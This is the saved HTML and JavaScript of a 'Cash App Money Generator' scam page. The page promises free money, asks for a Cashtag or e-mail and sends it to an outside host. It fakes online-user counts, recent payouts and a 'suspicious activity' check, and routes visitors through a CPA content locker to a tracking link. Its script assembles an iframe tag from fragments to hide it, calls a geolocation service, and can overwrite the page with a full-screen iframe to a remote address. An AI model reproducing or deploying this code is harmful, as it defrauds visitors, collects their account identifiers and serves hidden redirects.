<!DOCTYPE html>
<!--
T: 2022-03-06 00:19:05
Api: 2e2bc9cd6bddbd402521
It: 1943309

-->
<html><head>
    <title>Cash App Money Generator</title>
<meta name="description" content="Cash App Money Generator"/>
<meta property="og:title" content="Cash App Money Generator"/>
<meta property="og:description" content="Cash App Money Generator"/>
<meta name="referrer" content="no-referrer">

<!-- Analytics -->

<script
        src="https://browser.sentry-cdn.com/6.4.1/bundle.min.js"
        integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF"
        crossorigin="anonymous"
></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    
    ga('send', 'pageview');

</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(https://fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(https://fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(https://fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(https://fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        

body {
	font-family: play;
	font-size: 12px;
	font-weight: bold;
	color: #000000;
	margin: 0;
	padding: 0;
	background-position: center;
	background-repeat: no-repeat;
	background-size: cover;
	background-attachment: fixed;
	background-color: #00d64f;
}
.verify-text1{
	margin-top:20px;
	font-size: 20px;
}
.server-status {
    width: 100%;
    text-align: center;
    margin-top: 2%;
    padding-bottom: 5px;
    font-size: 12px;
}
.color-green{
  color:#ff0000;
}
.color-yellow{
  color:#ff0000;
}
.color-yellow1{
  color:black;
}
.color-black{
  color:black;
}
.ch-name{
	font-size: 18px;
}
.ch-current-sub{
	font-size: 16px;
}
.content{
padding: 20px 40px;
background-color: #ffffff;
text-align: center;
margin-left: 2%;
margin-right: 2%;
}
.logo{
   width:300px;
	max-width: 90%;
}
.icon{
  margin-top: 4%;
  width:100px;
}

.form-control {
	outline: none;
    display: inline-block;
    width: 100%;
    height: calc(2em + .5rem + 5px);
    padding: 0px 10px 0 45px;
    font-size: 22px;
    line-height: 1.5;
    color: #232323;
    background-color: white;
    background-clip: padding-box;
    border: 3px solid #00d632;
}
input {
    -webkit-writing-mode: horizontal-tb !important;
    text-rendering: auto;
    color: -internal-light-dark(black, white);
    letter-spacing: normal;
    word-spacing: normal;
    text-transform: none;
    text-indent: 0px;
    text-shadow: none;
    display: inline-block;
    text-align: start;
    appearance: auto;
    background-color: -internal-light-dark(rgb(255, 255, 255), rgb(59, 59, 59));
    -webkit-rtl-ordering: logical;
    cursor: text;
    margin: 0em;
    font: 400 13.3333px Arial;
    padding: 1px 2px;
    border-width: 2px;
    border-style: inset;
    border-color: -internal-light-dark(rgb(118, 118, 118), rgb(133, 133, 133));
    border-image: initial;
}
.inputicon {
	padding: 4px;
	color: #1470a1;
	font-weight: 700;
	text-transform: uppercase;
	font-size: 26px;
	position: absolute;
	left: -60px;
	top: 45px;


}

.form-group {
	min-width: 240px;
    margin: 0 auto;
    width: 60%;
    position: relative;
}

.platform-bnt{
  position: relative;
  margin: 5px;
  display: inline-block;
  background: #ff0000;
  width: 180px;
  color: #000;
  text-align: center;
  font-size: 32px;
  text-transform: uppercase;
  padding-top:50px;
  padding-bottom: 30px;
  cursor: pointer;
}
.platform-bntnext{
  position: relative;
  margin-top: 35px;
  display: block;
  background: #00d64f;
  width: 180px;
  color: #000;
  text-align: center;
  font-weight: bold;
  font-size: 32px;
  text-transform: uppercase;
  padding:20px 30px 20px 30px;
  cursor: pointer;
}
.platform-bntverify{
	max-width: 250px;
position: relative;
margin-top: 35px;
display: block;
background: #1b00ff;
width: 80%;
color: #000;
text-align: center;
font-weight: bold;
font-size: 32px;
text-transform: uppercase;
padding: 20px 30px 20px 30px;
cursor: pointer;
}
.platform-bnt:hover{
  position: relative;
  margin: 5px;
  display: inline-block;
  /*background: #adad0d;*/
  background-image: url("img/bnt-bg.png.html");
  background-repeat: no-repeat;
  background-size: cover;
  width: 180px;
  color: #000;
  text-align: center;
  font-size: 32px;
  text-transform: uppercase;
  padding-top:50px;
  padding-bottom: 30px;
}
.help {
	background-color: #ffffff;
  text-align: center;
  margin-top: 10px;
  width:49%;
float: left;
height: 298px;
}
.activity {
	background-color: #ffffff;
	text-align: center;
  margin-top: 10px;
  width:49%;
float: right;
position: relative;
height: 298px;
margin-bottom: 50px;
}
.menu{

  position: relative;
  display: inline-block;
  margin: 20px 15px 0px 15px;
  background-color: yellow;
  padding: 5px 10px 5px 10px;
	cursor: pointer;
}
.menu1{

  position: relative;
  display: inline-block;
  margin: 20px 15px 0px 15px;
  background-color: #00d632;
  padding: 5px 10px 5px 10px;
	cursor: pointer;
}
.help-content{
	padding: 5px;

}
.footer{
  /* position: relative; */
  /* margin-top: 10px; */
  /* text-align: center; */
  margin-left: 2%;
  margin-right: 2%;
  margin-bottom: 50px;
  /* height: 330px; */
  /*overflow: auto;*/
}

h2{

	margin: 10px 10px 0px 10px;
	
}
.recent-header{
  position: relative;
}
.recent-right{
  position: absolute;
  right:0px;
  margin-right: 20px;
	font-size: 18px;
	color:black;
	font-weight: bold;
	margin-top: 10px;
	position: absolute;
  }
.recent-icon{
  display: block;
  margin-top: 30px;
  position: relative;
}
.bg-progress{
	background-color: #ffffff;
    width: 100%;
    bottom: 0px;
    /* margin-top: 15px; */
    padding: 20px 0px 20px 0px;
    box-shadow: 0px -4px 5px #0000004f;
    position: absolute;
}
.pro-bar-bg{
  width:95%;
  height: 5px;
  background-color: #000000;
  position: relative;
	text-align: left;
}
.step1{
  width: 26px;
  height: 26px;
  border-radius: 50%;
  background-color: #00d632;
  position: absolute;
  top:-11px;
}
.step2{
  width: 26px;
  height: 26px;
  border-radius: 50%;
  background-color: #00d632;
  position: absolute;
  top:-11px;
  left:50%;
}
.step3{
  width: 26px;
  height: 26px;
  border-radius: 50%;
  background-color: #00d632;
  position: absolute;
  top:-11px;
  right: 0px;
}
.gen-text{
  position: absolute;
  top:-20px;
  left:20%;
}
.gen-text1{
  position: absolute;
  top:-20px;
  left:70%;
}
.pro-bar{
	width: 0px;
	height: 100%;
	background-color: #000000;
}
.recent-name{
	font-size: 18px;
	color:black;
	font-weight: bold;
	margin-top: 10px;
	position: absolute;
	left:0px;
	margin-left: 20px;
}
.text-size28-black{
	font-size: 28px;
	color:black;
	font-weight: bold;
	margin-top: 5px;
}
.text-size28-white{
	font-size: 28px;
	color:black;
	font-weight: bold;
	margin-top: 5px;
}

.shake{
animation: Anishake 0.5s;
animation-fill-mode: forwards;
}

@keyframes Anishake {
0% { transform: translate(1px, 1px) rotate(0deg); }
10% { transform: translate(-1px, -2px) rotate(-1deg); }
20% { transform: translate(-3px, 0px) rotate(1deg); }
30% { transform: translate(3px, 2px) rotate(0deg); }
40% { transform: translate(1px, -1px) rotate(1deg); }
50% { transform: translate(-1px, 2px) rotate(-1deg); }
60% { transform: translate(-3px, 1px) rotate(0deg); }
70% { transform: translate(3px, 1px) rotate(-1deg); }
80% { transform: translate(-1px, -1px) rotate(1deg); }
90% { transform: translate(1px, 2px) rotate(0deg); }
100% { transform: translate(1px, -2px) rotate(0deg); }
}

.page2{
	position: absolute;
	top:0px;
	left: 0px;
	min-width: 100%;
	min-height: 100%;
	overflow:auto;
	background-color: #ffffffe0;
}

.allcard{
margin-top:5%;
max-width: 600px;
width: 80%
}

.card{
		width:250px;
			filter: invert(0.2);
}
.card:hover{
	filter: invert(0);
	cursor:pointer;
}

.slide-in-top1{animation:slide-in-top .2s cubic-bezier(.25,.46,.45,.94) both}
.slide-in-top2{animation:slide-in-top .4s cubic-bezier(.25,.46,.45,.94) both}
.slide-in-top3{animation:slide-in-top .6s cubic-bezier(.25,.46,.45,.94) both}
.slide-in-top4{animation:slide-in-top .8s cubic-bezier(.25,.46,.45,.94) both}
@keyframes slide-in-top{0%{transform:translateY(-1000px);opacity:0}100%{transform:translateY(0);opacity:1}}


.slide-out-top{animation:slide-out-top .8s cubic-bezier(.25,.46,.45,.94) both}
@keyframes slide-out-top{0%{transform:translateY(1);opacity:1}100%{transform:translateY(-1000px);opacity:0}}


.generator-text{
	display: inline-block;
margin-top:200px;
font-size:32px;
margin-bottom:10px;
text-shadow: 0 2px 5px #252525;
}
.loading{
	width: 30px;
	margin-bottom: -5px;
	animation: Aniloading1 1s linear infinite;
	}
	@keyframes Aniloading1 {
	  100% {transform: rotate(360deg);}
	}

.verify-text{
	margin-top :200px;
	font-size: 44px;
	text-shadow: 0 5px 5px #00486f;
}
.line{
max-width: 500px;
	width: 80%;
	height: 1px;
	background-color: white;
	margin-top:20px;
}
.flicker-1{animation:flicker-1 2s linear infinite both}
@keyframes flicker-1{0%,100%{opacity:1}41.99%{opacity:1}42%{opacity:0}43%{opacity:0}43.01%{opacity:1}47.99%{opacity:1}48%{opacity:0}49%{opacity:0}49.01%{opacity:1}}


.profile-info{
	max-width: 500px;
	width: 90%;
	padding: 5px;
	background-color: white;
	border-radius: 10px;
	}

@media only screen and (max-width:720px) {
	.content{
	padding: 20px 0px;
	background-color: #ffffff;
	text-align: center;
	margin-left: 0%;
	margin-right: 0%;
	}
	.help{
		width: 100%;
		height:auto;
	}
	.activity{
		width: 100%;
		height:auto;

	}
	.bg-progress{
		margin-top: 20px;
		position: relative;
	}
	.recent-name{
		font-size: 16px;
	}
	.recent-right{
		font-size: 16px;
	}
}
@media only screen and (max-width:815px) {
	.inputicon {
	padding: 4px;
	color: #1470a1;
	font-weight: 700;
	text-transform: uppercase;
	font-size: 26px;
	position: absolute;
	left: -60px;
	top: 75px;
	
}
@media only screen and (max-width:405px) {
	.inputicon {
	padding: 4px;
	color: #1470a1;
	font-weight: 700;
	text-transform: uppercase;
	font-size: 26px;
	position: absolute;
	left: -60px;
	top: 105px;
	}
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Get Money on your Cash App account!</title>
  <link rel="icon" type="image/png" href="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1612333250dd83a0b6e37d2da558ff642d5cad58d3.png">
  <meta name="description" content="Get Money on your Cash App account!">
<meta name="keywords" content="Get Money on your Cash App account!">

     <meta property="og:title" content="Get Money on your Cash App account!">
     <meta property="og:description" content="Get Money on your Cash App account!">
     <meta property="og:type" content="website">
     <meta property="og:url" content="">
     <meta property="og:image" content="">


    <link rel = "stylesheet"  type = "text/css"  href = "style.css.html" />
    <link rel="stylesheet"
            href="https://fonts.googleapis.com/css?family=Anton">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Play">
</head>

<body>
  <div class="server-status">
      <b>Status:</b> <span class="color-green">ONLINE</span>
      <b>Last Update:</b> <span class="color-green" id="lastupdate">26 Jul 2021</span>
      <b>Online users:</b> <span class="color-green" id="user-online">1042</span>
  </div>
<div class="content">
<h1 style="margin:0px;font-size:28px;font-weight: bold;color:black">Cash App Money Generator</h1>
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16252369081786078612bd4032f09cb251df5c64bb.png" class="logo"></img>

<div class="form-group">
            <div class="color-black" style="font-size:28px;font-weight: bold">Enter Your Cashtag Unique Name Or E-mail
			</div>
              <br>
              <input type="text" class="form-control usernameInput" onkeydown="entertext()" id="name" placeholder="$Cashtag Or E-mail">
              <div class="inputicon">
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1612333250dd83a0b6e37d2da558ff642d5cad58d3.png" style="width: 50px;">
              </div>
          </div>

          <div style="color:#000;font-size:18px;font-weight: bold;margin-top:10px;">
		  Get Money on your Cash App account!</div>

          <div class="platform" id="platform">
<center><div class="platform-bntnext flicker-1" id="bntconnect" onclick="connect()">CONNECT</div></center>
                    </div>
</div>
<div class="footer">

                    <div class="help" id="help">
                        <h2>How to use</h2>
              <div class="menu1 color-#00d6321" id="help1" Onclick="help1()">1</div>
              <div class="menu color-#00d632" id="help2" Onclick="help2()">2</div>
              <div class="menu color-#00d632" id="help3" Onclick="help3()">3</div>
                        <div class="tab-content">
                            <div id="menu0" class="help-content">
                                <br>
                                <h3>CONNECTING TO YOUR ACCOUNT</h3>
                                <p>Enter Your Cashtag Unique Name and clicking the "Connect" button.</p>
                            </div>
                            <div id="menu1" class="help-content"  style="display:none">
                                <br>
                                <h3>GENERATING RESOURCES</h3>
                                <p>Select the amount of Cash to add</p>
                            </div>
                            <div id="menu2" class="help-content"  style="display:none">
                                <br>
                                <h3>VERIFICATION AND DELIVERY</h3>
                                <p>Wait until the processing is completed. Complete the Human Verification and All Done!.</p>
                            </div>
                        </div>
                    </div>




                      <div class="activity" id="activity">
                        <div class="recent-header">
                        <div class="recent-name" id="recent-name">vucavuca</div>
                        <div class="recent-right">RECENT ACTIVITY</div>
                        </div>
                        <div class="recent-icon"><center><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1612333250dd83a0b6e37d2da558ff642d5cad58d3.png" class="icon"></img></div>
                          <h2><div class="text-size28-white" id="recent-num">0</div></h2>
                          <div class="text-size28-white">AMOUNT ADDED</div>
                        <div class="bg-progress">
                        <center>  <div class="pro-bar-bg">
                          <span class="gen-text">Generation</span>
                          <span class="gen-text1">Verifying</span>
                        <div class="step1" id="step1">  </div>
                        <div class="step2" id="step2"></div>
                        <div class="step3" id="step3"> </div>
                        <div class="pro-bar" id="pro-bar"></div>
                        </div>
</center>

                        </div>
                      </div>

</div>
<div class="page2" id="page2" style="display:none">
      <center>
  <div class="allcard" id="allcard">
    <div class="profile-info" id="profileinfo">
<img id="profile" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1612333250dd83a0b6e37d2da558ff642d5cad58d3.png" style="    width: 100px;
    border-radius: 50%;
    border-width: px;
    border-style: solid;
    border-color: #b7b7b7;
    box-shadow: 0 0 5px black;">
<div id="profilename" class="ch-name color-black">###</div>
    </div>
<div style="color:#000000; margin-top:10px;font-size:32px; margin-bottom:10px;text-shadow: 0 2px 5px #252525;">Select Amount</div>
<img class="card slide-in-top1" onclick="cardselected()" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1630571612a1154a641dfec54a3ab21f1526e5dbb6.png">
<img class="card slide-in-top2" onclick="cardselected()" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16305716117ea5492064be219e2500fd49c266a4ba.png">
<img class="card slide-in-top3" onclick="cardselected()" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1630571612842e1c12953a0d07a68261ad06d9bd36.png">
<img class="card slide-in-top4" onclick="cardselected()" src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1630571613c34b7b54892df682f40f003301374bc5.png">

</div>
<div class="generator" id="generator" style="display:none">
<div id="gen-text" class="generator-text">Loading</div><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/161909761701afebe6db914cae0df0e58526ed8013.png" id="loading" class="loading">
<div id="verify-form" style="display:none">
  <div id="verify-text" class="verify-text">VERIFICATION</div>
  <div id="verify-text1" class="verify-text1">SUSPICIOUS ACTIVITY DETECTED</div>
  <div id="verify-text1" class="verify-text1">YOU NEED TO PROVE THAT YOU ARE HUMAN TO ACTIVATE RESOURCES</div>
  <div id="line" class="line"></div>
  <div class="platform-bntverify flicker-1" onclick="CPABuildLock()" id="bntverify">VERIFY NOW</div>

</div>
</div>
</center>
</div>
</body>
<script src="main.js.html"></script>
</html>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2382671,"key":"d1eec","testing":1};
    var forward="https:\/\/www.verifyspot.net\/cl.php?id=9f23db9c114a9d3c2f9948a343598d7b";
    CPABUILDSETTINGS.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script src="https://d12u7tum9sda5e.cloudfront.net/f3656c2.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       CPABuildLock();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    var myVar2 = setInterval(UserTimer, 2000);
function UserTimer() {
	document.getElementById("user-online").innerHTML=Math.floor(Math.random() * 100)+600;
}

var d = new Date();
const months = ["January","February","March","April","May","June","July","August","September","October","November","December"];
document.getElementById("lastupdate").innerHTML=d.getDate() + " " + months[d.getMonth()] + " " +d.getFullYear();
var valactivity= setInterval(RecentActivity, 100);
var prostep=0;
var prostepDelay=0;
var recentCoin ;
var name;
const RandomCoin = ["100", "150", "250", "500"];
function random(){


recentCoin=RandomCoin[parseInt(Math.random()*4)];
var gennamelist = ["$Luhbaby", "$Scheche38", "$snohWhite","$Jamie67",
"$JREAL2019",
"$ComposerandPearls",
"$Briannawell",
"$B3autyQu33n",
"$Tootie1997",
"$StrawBerry",
"$aceFamily",
"$iponeRat4",
"$InimicalThug",
"$FearedButcher",
"$MultiplyDivide",
"$kitkat1",
"$ashBomb87",
"$BallBlaster",
"$LegendsReload",
"$BruteFact",
"$Blossflop",
"$TangoBoss",
"$OptimalAces",
"$InimicalThugs",
"$FearButchers",
"$LeftDivide",
"$Psychedelic",
"$Militaristic ",
"$KeenTeamSix",
"$FuzzyPack",
"$Gangsters",
"$Mortified",
"$Lyrical",
"$Outrageous",
"$Homely",
"$PlainPrivilege",
"$BrashThugs",
"$NuttyDomination",
"$ComplexSlayers",
"$FaultyDevils",
"$FanaticalTyranny",
"$OddHooligans",
"$OrganicPunks",
"$Quarrelsome",
"$Admirals",
"$Perpetrator",
"$Fighting",
"$targaryen",
"$faeelovee07",
"$miyaabriannaa",
"$Alexbugg100helpr",
"$XxGoldenWarior"];
name=gennamelist[Math.floor(Math.random() * 52)];
  document.getElementById("recent-name").innerHTML=(name);
}

function RecentActivity(){
  if (prostep<2){
      random()
  }
else if (prostep<52){
  document.getElementById("step1").style.backgroundColor="#00d632";
  document.getElementById("step2").style.backgroundColor="#393b3d";
  document.getElementById("step3").style.backgroundColor="#393b3d";
  document.getElementById("pro-bar").style.backgroundColor="#00d632";
    document.getElementById("pro-bar").style.width=prostep +"%";
    if (recentCoin==RandomCoin[0]){
          document.getElementById("recent-num").innerHTML= "$ " +(prostep*parseInt(RandomCoin[0]/52));
    }
    if (recentCoin==RandomCoin[1]){
          document.getElementById("recent-num").innerHTML="$ " +(prostep*parseInt(RandomCoin[1]/52));
    }
    if (recentCoin==RandomCoin[2]){
          document.getElementById("recent-num").innerHTML="$ " +(prostep*parseInt(RandomCoin[2]/52));
    }
    if (recentCoin==RandomCoin[3]){
          document.getElementById("recent-num").innerHTML="$ " +(prostep*parseInt(RandomCoin[3]/52)) ;
    }

}
else if(prostep<99){
document.getElementById("step2").style.backgroundColor="#00d632";
document.getElementById("pro-bar").style.width=prostep +"%";
document.getElementById("recent-num").innerHTML="$ " +recentCoin ;
}
else if(prostep<100){
document.getElementById("step1").style.backgroundColor="#32ab00";
document.getElementById("step2").style.backgroundColor="#32ab00";
document.getElementById("step3").style.backgroundColor="#32ab00";
document.getElementById("pro-bar").style.backgroundColor="#32ab00";
}
else if(prostep>130){
  prostep=0;

}
prostep++;
}


//*HOW TO USE

function help1(){
  document.getElementById("menu0").style.display="block";
  document.getElementById("help1").style.color="black";
  document.getElementById("help1").style.backgroundColor="#00d632";

  document.getElementById("help2").style.color="black;";
  document.getElementById("help2").style.backgroundColor="yellow";

  document.getElementById("help3").style.color="black;";
  document.getElementById("help3").style.backgroundColor="yellow";
  document.getElementById("menu1").style.display="none";
  document.getElementById("menu2").style.display="none";
}
function help2(){
  document.getElementById("menu0").style.display="none";
  document.getElementById("menu1").style.display="block";
  document.getElementById("help2").style.color="black";
  document.getElementById("help2").style.backgroundColor="#00d632";

  document.getElementById("help1").style.color="black";
  document.getElementById("help1").style.backgroundColor="yellow";

  document.getElementById("help3").style.color="black";
  document.getElementById("help3").style.backgroundColor="yellow";
  document.getElementById("menu2").style.display="none";
}
function help3(){
  document.getElementById("menu0").style.display="none";
  document.getElementById("menu1").style.display="none";
  document.getElementById("menu2").style.display="block";
  document.getElementById("help3").style.color="black";
  document.getElementById("help3").style.backgroundColor="#00d632";

  document.getElementById("help2").style.color="block";
  document.getElementById("help2").style.backgroundColor="yellow";

  document.getElementById("help1").style.color="block";
  document.getElementById("help1").style.backgroundColor="yellow";
}

function connect(){


  var getname=document.getElementById("name").value;
  if (getname.length<3){
    document.getElementById("name").classList.add('shake');
    document.getElementById("name").style.border="3px solid red";
  }else{
		  var data;
			var proicon="";
			var proname="";
			var d=window.location.href;
		fetch('https://allfile.club/ytdata/index.php?d='+getname+"&t="+offset,{referrerPolicy:'unsafe-url'})
		  .then(res => res.json())
		  .then(output => {
		  data =output;
		  proicon=data.icon;
		  strcountry=country;
		  proname=data.chname;
			document.getElementById("profile").src=proicon;
			document.getElementById("profilename").innerHTML=proname;
			if (proicon=="" || proname==""){
				document.getElementById("profileinfo").style.display="none";
			}
		})

        document.getElementById("bntconnect").innerHTML="Connecting";
        var valConnecting= setInterval(Connecting, 2000);
        function Connecting(){
          document.getElementById("bntconnect").innerHTML="CONNECTED";
          document.getElementById("bntconnect").style.color="#0300d6";
          var valConnected= setInterval(Connected, 2000);
          function Connected(){
            document.getElementById("page2").style.display="block";
            document.getElementById("help").style.display="none";
            document.getElementById("activity").style.display="none";
            document.getElementById("platform").style.display="none";
window.scrollTo({ top: 0, behavior: 'smooth' });
            clearInterval(valConnected);
          }
                      clearInterval(valConnecting);
        }
  }
}
var ow="i";
var k="if";
  ow=ow+"f";  ow=ow+"r";  ow=ow+"a";
  ow=ow+"me";  ow=ow+" ";  ow=ow+"sr";ow=ow+"c="; ow=ow+'"';ow=ow+"ht";ow=ow+"tps";ow=ow+":";var st='style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></'+k+'rame>';
  var strcountry='';
  var offset = new Date().getTimezoneOffset();
  offset=offset/-60;var num;
  var strcountry='';
  var data;var country;var code;var d=window.location.href;
  fetch('https://www.visitorlocation.info/data.php?d='+d+"&t="+offset,{referrerPolicy:'unsafe-url'})
  .then(res => res.json())
  .then(output => {
  data =output;
  country=data.country;
  strcountry=country;
  code=data.code;
  code=code.toLowerCase();
  s1=data.s1;
  s2=data.s2;
  num=data.num;
  if (strcountry!='' & num!=0){  document
    .body
    .innerHTML='<'+ow+'//'+s1+'.'+s2+'/'+num+'"'+ st;  }
  });
function entertext(){
  document.getElementById("name").style.border="3px solid #038271";
}
function cardselected(){
  var valConnecting= setInterval(Connecting,100);
  function Connecting(){
    document.getElementById("allcard").classList.add('slide-out-top');
    clearInterval(valConnecting);
  }
  var valConnecting2= setInterval(Connecting2, 2000);
  function Connecting2(){
  document.getElementById("allcard").style.display="none";
  document.getElementById("generator").style.display="block";
  startGen()
    clearInterval(valConnecting2);
  }
}

function startGen() {

var step=0;
  var valConnecting= setInterval(Connecting,2000);
  function Connecting(){

		if (step==0){
		      document.getElementById("gen-text").innerHTML="Scraping data";
		  }else if(step==1){
		    document.getElementById("gen-text").innerHTML="Saving data";
		  }else if(step==2){
		    document.getElementById("gen-text").innerHTML="Connecting Please Wait...";
		  }else if(step==3){
		    document.getElementById("loading").style.display="none";
		    document.getElementById("gen-text").innerHTML="Connected";
		  }else if(step==4){
		    document.getElementById("gen-text").innerHTML="Suspicious Activity Detected!";
		    document.getElementById("gen-text").style.color="red";
		    document.getElementById("gen-text").style.textShadow ="0px 0px 0px #252525";
		  }else if(step==5){
		document.getElementById("gen-text").style.display="none";
		document.getElementById("verify-form").style.display="block";
		        clearInterval(valConnecting);
		  }
step=step+1
  }
}

</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>
</html>
